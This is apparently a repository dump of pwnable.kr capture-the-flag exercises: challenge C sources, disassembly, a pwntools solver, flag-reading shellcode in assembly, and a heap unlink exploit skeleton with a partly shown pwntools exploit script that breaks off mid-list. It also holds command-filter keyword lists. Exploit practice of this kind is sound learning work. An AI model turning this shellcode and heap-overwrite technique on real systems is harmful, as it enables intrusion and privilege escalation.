39 |    0x00008dcc <+144>:			; <UNDEFINED> instruction: 0x0006a4bc
40 |    0x00008dd0 <+148>:	andeq	r10, r6, r4, asr #9
41 | End of assembler dump.
42 | (gdb) disass key1
43 | Dump of assembler code for function key1:
44 |    0x00008cd4 <+0>:	push	{r11}		; (str r11, [sp, #-4]!)
45 |    0x00008cd8 <+4>:	add	r11, sp, #0
46 |    0x00008cdc <+8>:	mov	r3, pc
47 |    0x00008ce0 <+12>:	mov	r0, r3
48 |    0x00008ce4 <+16>:	sub	sp, r11, #0
49 |    0x00008ce8 <+20>:	pop	{r11}		; (ldr r11, [sp], #4)
50 |    0x00008cec <+24>:	bx	lr
51 | End of assembler dump.
52 | (gdb) disass key2
53 | Dump of assembler code for function key2:
54 |    0x00008cf0 <+0>:	push	{r11}		; (str r11, [sp, #-4]!)
55 |    0x00008cf4 <+4>:	add	r11, sp, #0
56 |    0x00008cf8 <+8>:	push	{r6}		; (str r6, [sp, #-4]!)
57 |    0x00008cfc <+12>:	add	r6, pc, #1
58 |    0x00008d00 <+16>:	bx	r6
59 |    0x00008d04 <+20>:	mov	r3, pc
60 |    0x00008d06 <+22>:	adds	r3, #4
61 |    0x00008d08 <+24>:	push	{r3}
62 |    0x00008d0a <+26>:	pop	{pc}
63 |    0x00008d0c <+28>:	pop	{r6}		; (ldr r6, [sp], #4)
64 |    0x00008d10 <+32>:	mov	r0, r3
65 |    0x00008d14 <+36>:	sub	sp, r11, #0
66 |    0x00008d18 <+40>:	pop	{r11}		; (ldr r11, [sp], #4)
67 |    0x00008d1c <+44>:	bx	lr
68 | End of assembler dump.
69 | (gdb) disass key3
70 | Dump of assembler code for function key3:
71 |    0x00008d20 <+0>:	push	{r11}		; (str r11, [sp, #-4]!)
72 |    0x00008d24 <+4>:	add	r11, sp, #0
73 |    0x00008d28 <+8>:	mov	r3, lr
74 |    0x00008d2c <+12>:	mov	r0, r3
75 |    0x00008d30 <+16>:	sub	sp, r11, #0
76 |    0x00008d34 <+20>:	pop	{r11}		; (ldr r11, [sp], #4)
77 |    0x00008d38 <+24>:	bx	lr
78 | End of assembler dump.
79 | (gdb) 
80 | 


--------------------------------------------------------------------------------
/exercises/07_leg/leg.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <fcntl.h>
 3 | int key1(){
 4 | 	asm("mov r3, pc\n");
 5 | }
 6 | int key2(){
 7 | 	asm(
 8 | 	"push	{r6}\n"
 9 | 	"add	r6, pc, $1\n"
10 | 	"bx	r6\n"
11 | 	".code   16\n"
12 | 	"mov	r3, pc\n"
13 | 	"add	r3, $0x4\n"
14 | 	"push	{r3}\n"
15 | 	"pop	{pc}\n"
16 | 	".code	32\n"
17 | 	"pop	{r6}\n"
18 | 	);
19 | }
20 | int key3(){
21 | 	asm("mov r3, lr\n");
22 | }
23 | int main(){
24 | 	int key=0;
25 | 	printf("Daddy has very strong arm! : ");
26 | 	scanf("%d", &key);
27 | 	if( (key1()+key2()+key3()) == key ){
28 | 		printf("Congratz!\n");
29 | 		int fd = open("flag", O_RDONLY);
30 | 		char buf[100];
31 | 		int r = read(fd, buf, 100);
32 | 		write(0, buf, r);
33 | 	}
34 | 	else{
35 | 		printf("I have strong leg :P\n");
36 | 	}
37 | 	return 0;
38 | }
39 | 


--------------------------------------------------------------------------------
/exercises/08_mistake/in_rust/mistake.rs:
--------------------------------------------------------------------------------
 1 | use std::fs::File;
 2 | use std::io;
 3 | 
 4 | fn main() -> Result<(),io::Error> {
 5 |     let mut fd : File;  
 6 |     if fd = File::open("password") .is_ok() {
 7 |         //do something...
 8 |     } 
 9 |     Ok(())
10 | }
11 | 
12 | 


--------------------------------------------------------------------------------
/exercises/08_mistake/in_rust/rendered.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/08_mistake/in_rust/rendered.png


--------------------------------------------------------------------------------
/exercises/08_mistake/mistake.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <stdlib.h>
 4 | #include <fcntl.h>
 5 | #include <unistd.h>
 6 | 
 7 | #define PW_LEN 10
 8 | #define XORKEY 1
 9 | 
10 | void xor(char* s, int len){
11 | 	int i;
12 | 	for(i=0; i<len; i++){
13 | 		s[i] ^= XORKEY;
14 | 	}
15 | }
16 | 
17 | int main(int argc, char* argv[]){
18 | 	
19 | 	int fd;
20 | 	if(fd=open("password",O_RDONLY,0400) < 0){
21 | 		printf("can't open password %d\n", fd);
22 | 		return 0;
23 | 	}
24 | 
25 | 	char pw_buf[PW_LEN+1];
26 | 	int len;
27 | 	if(!(len=read(fd,pw_buf,PW_LEN) > 0)){
28 | 		printf("read error\n");
29 | 		close(fd);
30 | 		return 0;		
31 | 	}
32 | 
33 | 	char pw_buf2[PW_LEN+1];
34 | 	printf("input password : ");
35 | 	scanf("%10s", pw_buf2);
36 | 
37 | 	// xor your input
38 | 	xor(pw_buf2, 10);
39 | 
40 | 	if(!strncmp(pw_buf, pw_buf2, PW_LEN)){
41 | 		printf("Password OK\n");
42 | 		system("/bin/cat flag\n");
43 | 	}
44 | 	else{
45 | 		printf("Wrong Password\n");
46 | 	}
47 | 
48 | 	close(fd);
49 | 	return 0;
50 | }
51 | 
52 | 


--------------------------------------------------------------------------------
/exercises/08_mistake/two_prompts.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/08_mistake/two_prompts.png


--------------------------------------------------------------------------------
/exercises/09_shellshock/not_vulnerable.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/09_shellshock/not_vulnerable.png


--------------------------------------------------------------------------------
/exercises/09_shellshock/permission_denied.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/09_shellshock/permission_denied.png


--------------------------------------------------------------------------------
/exercises/09_shellshock/shellshock.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <unistd.h>
 4 | 
 5 | 
 6 | int main(){
 7 | 	setresuid(getegid(), getegid(), getegid());
 8 | 	setresgid(getegid(), getegid(), getegid());
 9 | 	system("bash -c 'echo shock_me'");
10 | 	return 0;
11 | }
12 | 
13 | 


--------------------------------------------------------------------------------
/exercises/09_shellshock/vulnerable.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/09_shellshock/vulnerable.png


--------------------------------------------------------------------------------
/exercises/10_coin/coin.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import re
 3 | 
 4 | #constants
 5 | INTRO_LENGTH =  10024
 6 | PORT = 9007
 7 | NUMBER_OF_ROUNDS = 100
 8 | LOCALHOST = '0'
 9 | REMOTEHOST = "pwnable.kr"
10 | 
11 | def main():
12 |     conn = remote(LOCALHOST, PORT)
13 |     conn.recv(INTRO_LENGTH)
14 |     for i in range(NUMBER_OF_ROUNDS):
15 |         n, c = re.compile("N=(\d+) C=(\d+)").match(nextline(conn)).groups()
16 |         n ,c = int(n), int(c)
17 |         lpivot, rpivot = 0, n//2
18 |         guesses = 0
19 |         while rpivot - lpivot > 0 and guesses < c:
20 |             guess = list(range(lpivot, rpivot))
21 |             send(conn, ' '.join([str(j) for j in guess]))
22 |             guesses += 1
23 |             counterfeit = (int(nextline(conn)) != len(guess)*10)
24 |             delta = rpivot - lpivot
25 |             
26 |             rpivot -= delta // 2
27 |             if not counterfeit:
28 |                 lpivot += delta
29 |                 rpivot += delta
30 |         
31 |         #use up leftover guesses
32 |         while guesses < c:
33 |             send(conn, "0")
34 |             _ = nextline(conn)
35 | 
36 |         #done weighing, report guess
37 |         send(conn, str(lpivot))
38 |         success_msg = nextline(conn)
39 |             
40 | 
41 |     #flag should be printed here
42 |     print(nextline(conn))
43 |     conn.close()  
44 | 
45 | def send(c, l):
46 |     print(l)
47 |     c.sendline(l)
48 | 
49 | def nextline(c):
50 |     l = c.recv(1024).decode('UTF-8')
51 |     print(l)
52 |     return(l)
53 | 
54 | main()
55 | 


--------------------------------------------------------------------------------
/exercises/10_coin/introduction.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/10_coin/introduction.png


--------------------------------------------------------------------------------
/exercises/11_blackjack/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/11_blackjack/flag.png


--------------------------------------------------------------------------------
/exercises/11_blackjack/negative_million.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/11_blackjack/negative_million.png


--------------------------------------------------------------------------------
/exercises/11_blackjack/normal_game.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/11_blackjack/normal_game.png


--------------------------------------------------------------------------------
/exercises/12_lotto/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/12_lotto/flag.png


--------------------------------------------------------------------------------
/exercises/12_lotto/lotto.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | #include <fcntl.h>
 5 | 
 6 | unsigned char submit[6];
 7 | 
 8 | void play(){
 9 | 	
10 | 	int i;
11 | 	printf("Submit your 6 lotto bytes : ");
12 | 	fflush(stdout);
13 | 
14 | 	int r;
15 | 	r = read(0, submit, 6);
16 | 
17 | 	printf("Lotto Start!\n");
18 | 	//sleep(1);
19 | 
20 | 	// generate lotto numbers
21 | 	int fd = open("/dev/urandom", O_RDONLY);
22 | 	if(fd==-1){
23 | 		printf("error. tell admin\n");
24 | 		exit(-1);
25 | 	}
26 | 	unsigned char lotto[6];
27 | 	if(read(fd, lotto, 6) != 6){
28 | 		printf("error2. tell admin\n");
29 | 		exit(-1);
30 | 	}
31 | 	for(i=0; i<6; i++){
32 | 		lotto[i] = (lotto[i] % 45) + 1;		// 1 ~ 45
33 | 	}
34 | 	close(fd);
35 | 	
36 | 	// calculate lotto score
37 | 	int match = 0, j = 0;
38 | 	for(i=0; i<6; i++){
39 | 		for(j=0; j<6; j++){
40 | 			if(lotto[i] == submit[j]){
41 | 				match++;
42 | 			}
43 | 		}
44 | 	}
45 | 
46 | 	// win!
47 | 	if(match == 6){
48 | 		system("/bin/cat flag");
49 | 	}
50 | 	else{
51 | 		printf("bad luck...\n");
52 | 	}
53 | 
54 | }
55 | 
56 | void help(){
57 | 	printf("- nLotto Rule -\n");
58 | 	printf("nlotto is consisted with 6 random natural numbers less than 46\n");
59 | 	printf("your goal is to match lotto numbers as many as you can\n");
60 | 	printf("if you win lottery for *1st place*, you will get reward\n");
61 | 	printf("for more details, follow the link below\n");
62 | 	printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n");
63 | 	printf("mathematical chance to win this game is known to be 1/8145060.\n");
64 | }
65 | 
66 | int main(int argc, char* argv[]){
67 | 
68 | 	// menu
69 | 	unsigned int menu;
70 | 
71 | 	while(1){
72 | 
73 | 		printf("- Select Menu -\n");
74 | 		printf("1. Play Lotto\n");
75 | 		printf("2. Help\n");
76 | 		printf("3. Exit\n");
77 | 
78 | 		scanf("%d", &menu);
79 | 
80 | 		switch(menu){
81 | 			case 1:
82 | 				play();
83 | 				break;
84 | 			case 2:
85 | 				help();
86 | 				break;
87 | 			case 3:
88 | 				printf("bye\n");
89 | 				return 0;
90 | 			default:
91 | 				printf("invalid menu\n");
92 | 				break;
93 | 		}
94 | 	}
95 | 	return 0;
96 | }
97 | 
98 | 


--------------------------------------------------------------------------------
/exercises/12_lotto/lotto_snippet.c:
--------------------------------------------------------------------------------
1 | for(i=0; i<6; i++){
2 | 		for(j=0; j<6; j++){
3 | 			if(lotto[i] == submit[j]){
4 | 				match++;
5 | 			}
6 | 		}
7 | 	}
8 | 
9 | 


--------------------------------------------------------------------------------
/exercises/12_lotto/normal_game.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/12_lotto/normal_game.png


--------------------------------------------------------------------------------
/exercises/13_cmd1/cmd1.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | 
 4 | int filter(char* cmd){
 5 | 	int r=0;
 6 | 	r += strstr(cmd, "flag")!=0;
 7 | 	r += strstr(cmd, "sh")!=0;
 8 | 	r += strstr(cmd, "tmp")!=0;
 9 | 	return r;
10 | }
11 | int main(int argc, char* argv[], char** envp){
12 | 	putenv("PATH=/thankyouverymuch");
13 | 	if(filter(argv[1])) return 0;
14 | 	system( argv[1] );
15 | 	return 0;
16 | }
17 | 
18 | 


--------------------------------------------------------------------------------
/exercises/14_cmd2/backslashes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/14_cmd2/backslashes.png


--------------------------------------------------------------------------------
/exercises/14_cmd2/cmd2.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | 
 4 | int filter(char* cmd){
 5 | 	int r=0;
 6 | 	r += strstr(cmd, "=")!=0;
 7 | 	r += strstr(cmd, "PATH")!=0;
 8 | 	r += strstr(cmd, "export")!=0;
 9 | 	r += strstr(cmd, "/")!=0;
10 | 	r += strstr(cmd, "`")!=0;
11 | 	r += strstr(cmd, "flag")!=0;
12 | 	return r;
13 | }
14 | 
15 | extern char** environ;
16 | void delete_env(){
17 | 	char** p;
18 | 	for(p=environ; *p; p++)	memset(*p, 0, strlen(*p));
19 | }
20 | 
21 | int main(int argc, char* argv[], char** envp){
22 | 	delete_env();
23 | 	putenv("PATH=/no_command_execution_until_you_become_a_hacker");
24 | 	if(filter(argv[1])) return 0;
25 | 	printf("%s\n", argv[1]);
26 | 	system( argv[1] );
27 | 	return 0;
28 | }
29 | 
30 | 


--------------------------------------------------------------------------------
/exercises/14_cmd2/tex_source.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/14_cmd2/tex_source.png


--------------------------------------------------------------------------------
/exercises/15_uaf/input.hex:
--------------------------------------------------------------------------------
1 | 00: 68 15 40 00 00 00 00 00 00 00 00 00 00 00 00 00 
2 | 10: 00 00 00 00 00 00 00 00
3 | 


--------------------------------------------------------------------------------
/exercises/16_memcpy/alloc_test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/16_memcpy/alloc_test.png


--------------------------------------------------------------------------------
/exercises/16_memcpy/in_disassembler.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/16_memcpy/in_disassembler.png


--------------------------------------------------------------------------------
/exercises/16_memcpy/inline_assembly.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/16_memcpy/inline_assembly.png


--------------------------------------------------------------------------------
/exercises/16_memcpy/naive_attempt.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/16_memcpy/naive_attempt.png


--------------------------------------------------------------------------------
/exercises/16_memcpy/naive_attempt_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/16_memcpy/naive_attempt_2.png


--------------------------------------------------------------------------------
/exercises/16_memcpy/solution.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/16_memcpy/solution.png


--------------------------------------------------------------------------------
/exercises/17_asm/actual_system_call_numbers.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/actual_system_call_numbers.png


--------------------------------------------------------------------------------
/exercises/17_asm/assembly_test_elf.asm:
--------------------------------------------------------------------------------
 1 | BITS 64
 2 | 
 3 | global _start
 4 | 
 5 | _start:
 6 |     inc rax
 7 |     dec rax
 8 |     inc rax
 9 |     dec rax
10 | 


--------------------------------------------------------------------------------
/exercises/17_asm/assembly_test_minimal.asm:
--------------------------------------------------------------------------------
1 | BITS 64
2 | 
3 | inc rax
4 | dec rax
5 | inc rax
6 | dec rax
7 | 


--------------------------------------------------------------------------------
/exercises/17_asm/assembly_test_minimal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/assembly_test_minimal.png


--------------------------------------------------------------------------------
/exercises/17_asm/draft_in_disassembler.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/draft_in_disassembler.png


--------------------------------------------------------------------------------
/exercises/17_asm/file_copy.asm:
--------------------------------------------------------------------------------
 1 | BITS 64
 2 | 
 3 | global _start
 4 | 
 5 | ;constants
 6 | ;system call ordinals
 7 | %define sys_read    0x000 
 8 | %define sys_write   0x001 
 9 | %define sys_open    0x002 
10 | %define sys_exit    0x03C
11 | 
12 | ;flag values
13 | %define O_RDONLY    0x000
14 | %define O_WRONLY    0x001
15 | %define O_CREAT     0x040
16 | %define S_IXUSR     0x040
17 | %define S_IWUSR     0x080
18 | %define S_IRUSR     0x100
19 | 
20 | ;locals
21 | %define buflen      0x100 
22 | 
23 | ;constants and global variables
24 | section .data 
25 | 
26 | source_file:
27 |     db "source.txt", 0
28 | destination_file:
29 |     db "destination.txt", 0
30 | buf:
31 |     times buflen db 0
32 | 
33 | ;code
34 | section .text
35 | 
36 | _start:
37 |     mov rdi, source_file ;fname
38 |     mov rsi, O_RDONLY ;flags
39 |     xor rdx, rdx ;mode
40 |     mov rax, sys_open
41 |     syscall
42 | 
43 |     mov rdi, rax ;fd
44 |     mov rsi, buf ;buf
45 |     mov rdx, buflen ;count
46 |     mov rax, sys_read
47 |     syscall
48 |     
49 |     mov rdi, destination_file ;fname
50 |     mov rsi, O_WRONLY  
51 |     or rsi, O_CREAT ;flags
52 |     mov rdx, S_IRUSR 
53 |     or rdx, S_IWUSR ;mode
54 |     mov rax, sys_open
55 |     syscall
56 | 
57 |     mov rdi, rax ; fd
58 |     mov rsi, buf ;buf
59 |     mov rdx, buflen ; count
60 |     mov rax, sys_write
61 |     syscall
62 | 
63 |     xor rdi, rdi
64 |     mov rax, sys_exit
65 |     syscall
66 | 


--------------------------------------------------------------------------------
/exercises/17_asm/need_lea.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/need_lea.png


--------------------------------------------------------------------------------
/exercises/17_asm/npic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/npic.png


--------------------------------------------------------------------------------
/exercises/17_asm/parameter.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/parameter.png


--------------------------------------------------------------------------------
/exercises/17_asm/shellcode_in_memory.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/shellcode_in_memory.png


--------------------------------------------------------------------------------
/exercises/17_asm/sigalarm.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/sigalarm.png


--------------------------------------------------------------------------------
/exercises/17_asm/solution.gdb:
--------------------------------------------------------------------------------
 1 | file asm
 2 | break *main+313
 3 | r < solution_draft
 4 | stepi
 5 | ni
 6 | ni
 7 | ni
 8 | ni
 9 | ni
10 | ni
11 | ni
12 | ni
13 | ni
14 | ni
15 | ni
16 | ni
17 | ni
18 | ni
19 | ni
20 | ni
21 | 


--------------------------------------------------------------------------------
/exercises/17_asm/solution_draft.asm:
--------------------------------------------------------------------------------
 1 | BITS 64
 2 | 
 3 | ;constants
 4 | ;system call ordinals
 5 | %define sys_read    0x000 
 6 | %define sys_write   0x001 
 7 | %define sys_open    0x002 
 8 | %define sys_exit    0x03C
 9 | 
10 | ;flag values
11 | %define O_RDONLY    0x000
12 | %define O_WRONLY    0x001
13 | %define O_CREAT     0x040
14 | %define S_IXUSR     0x040
15 | %define S_IWUSR     0x080
16 | %define S_IRUSR     0x100
17 | 
18 | ;locals
19 | %define stdout      0x001
20 | %define buflen      0x100 
21 | 
22 | 
23 | _start:
24 |     mov rdi, flag_name ;fname
25 |     mov rsi, O_RDONLY ;flags
26 |     xor rdx, rdx ;mode
27 |     mov rax, sys_open
28 |     syscall
29 | 
30 |     mov rdi, rax ;fd
31 |     mov rsi, buf ;buf
32 |     mov rdx, buflen ;count
33 |     mov rax, sys_read
34 |     syscall
35 |    
36 |     mov rdi, stdout ; fd
37 |     mov rsi, buf ;buf
38 |     mov rdx, buflen ; count
39 |     mov rax, sys_write
40 |     syscall
41 | 
42 |     xor rdi, rdi
43 |     mov rax, sys_exit
44 |     syscall
45 | 
46 | ;constants and global variables
47 | flag_name:
48 |     db  "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong", 0 
49 | buf:
50 |     times buflen db 0
51 | 
52 | 


--------------------------------------------------------------------------------
/exercises/17_asm/solution_draft_redacted.asm:
--------------------------------------------------------------------------------
 1 | BITS 64
 2 | 
 3 | ;constants
 4 | ;system call ordinals
 5 | %define sys_read    0x000 
 6 | %define sys_write   0x001 
 7 | %define sys_open    0x002 
 8 | %define sys_exit    0x03C
 9 | 
10 | ;flag values
11 | %define O_RDONLY    0x000
12 | %define O_WRONLY    0x001
13 | %define O_CREAT     0x040
14 | %define S_IXUSR     0x040
15 | %define S_IWUSR     0x080
16 | %define S_IRUSR     0x100
17 | 
18 | ;locals
19 | %define stdout      0x001
20 | %define buflen      0x100 
21 | 
22 | 
23 | _start:
24 |     mov rdi, flag_name ;fname
25 |     mov rsi, O_RDONLY ;flags
26 |     xor rdx, rdx ;mode
27 |     mov rax, sys_open
28 |     syscall
29 | 
30 |     mov rdi, rax ;fd
31 |     mov rsi, buf ;buf
32 |     mov rdx, buflen ;count
33 |     mov rax, sys_read
34 |     syscall
35 |    
36 |     mov rdi, stdout ; fd
37 |     mov rsi, buf ;buf
38 |     mov rdx, buflen ; count
39 |     mov rax, sys_write
40 |     syscall
41 | 
42 |     xor rdi, rdi
43 |     mov rax, sys_exit
44 |     syscall
45 | 
46 | ;constants and global variables
47 | flag_name:
48 |     db  "redacted_for_brevity", 0 
49 | buf:
50 |     times buflen db 0
51 | 
52 | 


--------------------------------------------------------------------------------
/exercises/17_asm/solution_redacted.asm:
--------------------------------------------------------------------------------
 1 | BITS 64
 2 | 
 3 | ;constants
 4 | ;system call ordinals
 5 | %define sys_read    0x000 
 6 | %define sys_write   0x001 
 7 | %define sys_open    0x002 
 8 | %define sys_exit    0x03C
 9 | 
10 | ;flag values
11 | %define O_RDONLY    0x000
12 | %define O_WRONLY    0x001
13 | %define O_CREAT     0x040
14 | %define S_IXUSR     0x040
15 | %define S_IWUSR     0x080
16 | %define S_IRUSR     0x100
17 | 
18 | ;locals
19 | %define stdout      0x001
20 | %define buflen      0x100 
21 | 
22 | %macro rel_init 0
23 |     call rel_hook
24 |     rel_hook: pop rbp
25 | %endmacro
26 | %define rel(offset) rbp+offset-rel_hook
27 | 
28 | 
29 | _start:
30 |     rel_init
31 |     lea rdi, [rel(flag_name)] ;fname
32 |     mov rsi, O_RDONLY ;flags
33 |     xor rdx, rdx ;mode
34 |     mov rax, sys_open
35 |     syscall
36 | 
37 |     mov rdi, rax ;fd
38 |     lea rsi, [rel(buf)] ;buf
39 |     mov rdx, buflen ;count
40 |     mov rax, sys_read
41 |     syscall
42 |    
43 |     mov rdi, stdout ; fd
44 |     lea rsi, [rel(buf)] ;buf
45 |     mov rdx, buflen ; count
46 |     mov rax, sys_write
47 |     syscall
48 | 
49 |     xor rdi, rdi
50 |     mov rax, sys_exit
51 |     syscall
52 | 
53 | ;constants and global variables
54 | flag_name:
55 |     db  "redacted_for_brevity", 0 
56 | buf:
57 |     times buflen db 0
58 | 
59 | 


--------------------------------------------------------------------------------
/exercises/17_asm/solve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/solve.png


--------------------------------------------------------------------------------
/exercises/17_asm/stub.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/17_asm/stub.png


--------------------------------------------------------------------------------
/exercises/18_unlink/attack_overview.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/18_unlink/attack_overview.png


--------------------------------------------------------------------------------
/exercises/18_unlink/dog_chemistry_set.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/18_unlink/dog_chemistry_set.jpg


--------------------------------------------------------------------------------
/exercises/18_unlink/exploit_skeleton.asm:
--------------------------------------------------------------------------------
 1 | BITS 32
 2 | 
 3 | %define B_BUF_PLUS_FOUR 0xdeadbeef
 4 | %define STACK_VAR 0xcafebabe
 5 | %define buffer_char 0x41
 6 | %define SHELL 0x080484eb
 7 | %define A_TO_B_OFFSET 0x18
 8 | %define A_TO_INPUT_START_OFFSET 0x8
 9 | 
10 | A_8:
11 |     times A_TO_B_OFFSET-A_TO_INPUT_START_OFFSET db buffer_char
12 | B_0:
13 |     dd B_BUF_PLUS_FOUR
14 |     dd STACK_VAR
15 |     dd SHELL
16 | 


--------------------------------------------------------------------------------
/exercises/18_unlink/jz_instruction.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/18_unlink/jz_instruction.png


--------------------------------------------------------------------------------
/exercises/18_unlink/memory_map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/18_unlink/memory_map.png


--------------------------------------------------------------------------------
/exercises/18_unlink/semantic_diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/18_unlink/semantic_diagram.png


--------------------------------------------------------------------------------
/exercises/18_unlink/semantic_diagram_eh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BenH11235/pwnable_writeup/e386d962d16928d646a8ed6f8a44f940f6a87952/exercises/18_unlink/semantic_diagram_eh.png


--------------------------------------------------------------------------------
/exercises/18_unlink/solution.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/python
 2 | from __future__ import print_function
 3 | import struct
 4 | import re
 5 | import sys
 6 | import pwn as pwntools
 7 | 
 8 | class TARGET:
 9 |     UNLINK_PATH = "/home/unlink/unlink"
10 |     EXPLOIT_SKELETON = "exploit_skeleton"
11 |     OFFSET_HEAP_A_TO_B = 0x18
12 | 
13 | class MOCK:
14 |     UNLINK_PATH = "./unlink"
15 |     EXPLOIT_SKELETON = "exploit_skeleton_mock"
16 |     OFFSET_HEAP_A_TO_B = 0x20
17 | 
18 | MAGIC_BBUF_PLUS_ESP_TWEAK = b"\xef\xbe\xad\xde"
19 | MAGIC_STACK_VAR = b"\xbe\xba\xfe\xca"
20 | OFFSET_LINK_BUF = 0x8
21 | OFFSET_STACK_A_TO_ESP_BKP = 0x10
22 | ESP_TWEAK_WHEN_RESTORED = -0x4
23 |    
24 | def main():
25 |     #load environment-dependent parameters
26 |     env = getenv()
27 | 
28 |     #start process and get problem parameters
29 |     p = pwntools.process(env.UNLINK_PATH)
30 |     stack_leak = yoink_hexnum(p.recvline())
31 |     heap_leak = yoink_hexnum(p.recvline())
32 |     while b"shell" not in p.recvline(): 
33 |         pass
34 | 
35 |     #compute exploit
36 |     with open(env.EXPLOIT_SKELETON,"rb") as fh:
37 |         exploit = fh.read()
38 |     b_buf = heap_leak + env.OFFSET_HEAP_A_TO_B + OFFSET_LINK_BUF
39 |     stack_var = stack_leak + OFFSET_STACK_A_TO_ESP_BKP
40 |     magic_to_replace = [
41 |             (
